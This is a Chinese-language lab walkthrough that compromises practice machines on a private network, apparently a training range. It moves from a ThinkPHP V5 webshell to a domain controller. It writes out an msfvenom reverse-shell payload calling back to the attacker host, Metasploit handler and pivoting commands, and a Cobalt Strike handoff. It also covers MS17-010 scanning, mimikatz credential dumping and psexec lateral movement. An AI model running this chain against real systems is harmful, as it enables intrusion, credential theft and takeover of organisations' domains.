环境配置
链接:百度网盘 请输入提取码
提取码:l8r7
攻击机:kali2022.03 192.168.135.128(NET模式)
win7 192.168.138.136 (仅主机模式) 192.168.135.150 (NET模式)
win2008 192.168.138.138 (仅主机模式)
web渗透
1.nmap探测目标靶机开放端口和服务情况
nmap -p- -A -sV 192.168.135.150
2.可以看到是一个ThinkPHP V5的一个网站
3.直接用工具去检测是否存在漏洞
https://github.com/Lotus6/ThinkphpGUI/releases/tag/1.3
4.发现存在漏洞,直接点getshell用蚁剑去连接
5.成功连接,执行ipconfig发现还有一块c段为138的网卡
横向渗透
1.用msfvenom生成木马,上传到蚁剑上。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.135.128 LPORT=7777 -f exe -o 7777.exe
2.msf开启监听,执行7777.exe
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.135.128 set LPORT 7777 run
3.成功拿到shell, 执行迁移进程命令, 系统会自动寻找合适的进程然后迁移
run post/windows/manage/migrate
4.添加路由
run autoroute -s 192.168.138.0/24
run autoroute -p
5.设置代理
use auxiliary/server/socks_proxy set srvhost 127.0.0.1 set srvport 8989 run
6.getsystem 进行提权,
net group "domain computers" /domain //查看域控
ping sun.com //查看域控ip
7.将msf上线到cs(cs先设置监听)
use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set lport 6666 set lhost 192.168.135.128 set session 1 run
8.我这里直接利用梼杌进行上传fscan,并执行
9.发现有ms17-010漏洞,并且开放139,135,445端口
拿域控
1.点一下,显示所以主机
2.创建smb监听
3.点击psexec进行横向移动
4.要先run mimikatz拿到密码信息,再填好空格,点击launch 等一会域控就上线了
5.成功上线cs并且是system权限